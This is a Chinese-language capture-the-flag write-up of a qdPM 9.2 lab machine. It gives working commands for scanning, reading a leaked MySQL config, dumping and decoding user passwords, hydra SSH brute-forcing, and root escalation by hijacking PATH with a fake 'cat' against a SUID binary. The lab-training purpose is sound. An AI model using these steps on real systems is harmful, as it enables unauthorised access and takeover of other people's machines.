目录

简介

信息收集

0x01 主机发现

0x02 端口扫描

0x03 目录爆破

漏洞利用

0x04 查找poc

0x05 进入数据库

提权

0x06 内网信息收集 

0x07 提权 

总结

简介

        该靶场前期考验的是我们的信息收集能力，通过信息收集找到一个框架的漏洞，再通过该漏洞进入数据库，找到远程连接ssh的账号密码，通过hydra爆破确认账号密码，内网部分是通过信息收集，主要是通过靶场给的提示去进一步找到文件，然后通过自己创建一个具有权限的文档，达到提权的目的。（有能力的小伙伴可以跟我小编的概述先自己去做一遍，不懂得再去看提升可能会更大哦！）

kali主机：192.168.1.58

靶机：192.168.1.18

信息收集

0x01 主机发现

发现靶机可以使用多种方式，这边举例三种
arp-scan -l      
netdiscover -r 192.168.1.1/24              #当前网段
nmap -sP 192.168.1.1/24                    #当前网段 

 

0x02 端口扫描

nmap -sV -T5 -p- -A 192.168.1.18

登入80端口，发现是一个登入界面

 在登入界面中发现下面存在qdPM 9.2的信息

0x03 目录爆破

其实这一步可以不要，这边是使用两种方法去做一个信息收集，上面我们得到那个框架信息我们就可以直接去找漏洞，也就是可以直接跳到漏洞利用部分。

dirb http://192.168.1.18

 把爆破的目录可以都去看看，这边我们主要是看core文件下的config文件里面的databases.yml

 发现mysql的账号密码

账号：qdpmadmin
密码：UcVQCMQk2STVeS6J

 

漏洞利用

0x04 查找poc

上面我们发现qdPM 9.2的信息，我们可以在msf去寻找他的漏洞

searchsploit qdPM 9.2                                        #查询该漏洞
locate php/webapps/50176.txt                                 #查询漏洞poc位置
cp /usr/share/exploitdb/exploits/php/webapps/50176.txt .     #复制该漏洞到当前位置
cat 50176.txt                                                #查看poc

0x05 进入数据库

发现一条默认地址，我们可以访问（上面我们爆破出来了，咱们就直接利用了）

mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h 192.168.1.18
show databases;
use staff
show tables;
select * from user;
select * from login;

 发现密码是加密的，这里我们直接通过base64解密

账号：
meyer
dexter
travis
lucas
smith密码：（解密后）
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
cqNnBWCByS2DuJSy
DJceVy98W28Y7wLg

 把他们分别放入users.txt和passwd.txt后，使用hydra爆破。

hydra -L users.txt -P passwd.txt 192.168.1.18 ssh爆破出两组账号密码
[22][ssh] host: 192.168.1.18   login: dexter   password: 7ZwV4qtg42cmUXGX
[22][ssh] host: 192.168.1.18   login: travis   password: DJceVy98W28Y7wLg

 使用ssh连接

提权

0x06 内网信息收集 

第一个连接travis，连接后发现有个flag，并没有其他可以利用的信息，sudo也不能提权，我们直接跳过到第二个。

ICA{Secret_Project}

登入到dexter

发现一个note.txt

It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

 这个时候我们要去寻找一些执行文件，我们通过find去找

 find / -perm -4000 2>/dev/null

 通过验证，发现第一个是存在利用点的

strings get_access 

0x07 提权 

这个时候我们发现cat我们调用不了，我们需要自己创建一个。

创建cat时发现其他目录环境不能写入进去，我们得进入/home里去执行。

cd /home 
echo "/bin/bash" > /tmp/cat            #写一个假的cat
export PATH=/tmp:$PATH                 #将当前目录写入到环境
chmod +x /tmp/cat                      #给cat权限
echo $PATH                             #查看有没有写入成功
/opt/get_access                        #执行

 提权成功，去到root目录下找到第二个fiag

 

总结

涉及知识点：

1.信息收集

2.漏洞的查找和利用

收获：这个靶场相对而言是比较简单的，主要是信息收集占大部分时间，利用漏洞点也比较好理解，希望小伙伴可以好好消化里面的知识点。